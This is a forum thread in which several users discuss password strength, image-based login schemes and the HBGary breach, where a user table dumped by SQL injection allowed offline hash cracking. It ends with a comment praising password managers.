Main Area and Open Discussion > General Software Discussion
Instantly Increasing Password Strength
Stoic Joker:
Anything else done to reduce the complexity or length in order to make it more suitable for human use will reduce the level of security.
--- End quote ---
Not necessarily. As I suggested before in another thread, three way login forms can be very powerful.
You can't mass brute force a photo upload for an image captcha unless you have access to the home storage file already but even then you have to know each users' specific thought process and which personal photo they are using to access something.-Paul Keith (February 24, 2011, 09:36 AM)
--- End quote ---
Okay, from a front door perspective only...I'd agree - I find the user, pass, pic, phrase logons much less annoying and effective than capachas which are easily defeated with OCR. But... That's not what we are (or the thread is) discussing.
The question on the table was regarding the HBGeary fiasco. Where the User Table had already been dumped via SQL injection. So the additional bits of info (pic & phrase) could simply be read from the next column over, and would afford no further resistance.
So the discussion was really focused on how complex does a password really need to be to keep it from being Hash Cracked in a matter of hours (e.g. it's all straight up back door stuff).
Paul Keith:
Well the thread was two fold. One simplified password strength and the other is that situation.
I'd argue since there's a separate HBGary thread, that the front door perspective is more of a major component of this thread than the HBGary example. (sorry if it's really HBGeary, I didn't really look into the topics in depth and most of what I read was written HBGary)
In that sequence though, does a password really help? Most security relies on the front door being backdoored, not entered through.
It would probably be more secure for HBGary to have an easier deceptive information alongside real information to make disinformation decipheration much harder. In that sense, it's like an encrypted container. Get into the OS but all you can do is just delete the files, not view it.
In here, you're viewing the files but you don't know that you're being convinced to treat the wrong files as legit and the chances of a whistle blower getting the wrong picture means there's a lower chance someone is going to look again after what has been confirmed. That's the security there IMO. The password is just useless no matter how complex. You're basically attracting attention to a compromised situation. There's a very low percentage chance that the guys won't figure out the complex password eventually anyway. Obscurity is really your best password especially if it's obscuring via red herring.
Stoic Joker:
HBGary/HBGeary I had a feeling I spellt that wrong... :)
Their problem was the front door had a set of keys left in it ... In the form of unvalidated SQL input being allow to execute against the server. Which is how the table got "dumped". This allowed all of the bruteforcing to be done off-line on fast (and distributed) hardware. No more internet connection speed slowing down the number of attempts per second.
Paul Keith:
Yeah, that was what I was trying to imply.
I don't know anything about SQL but I do know one thing, if you leave your keys at the front door, eventually someone's bound to open your vault no matter how complicated the lock is unless you trick them into thinking the treasure is there.
Mattphoes:
I use "Keypass" to store my passwords. It also offers to create random passwords with a single click.
What I really hate is that many websites limits the maximum password length.
Navigation
[0] Message Index
[#] Next page
[*] Previous page
Go to full version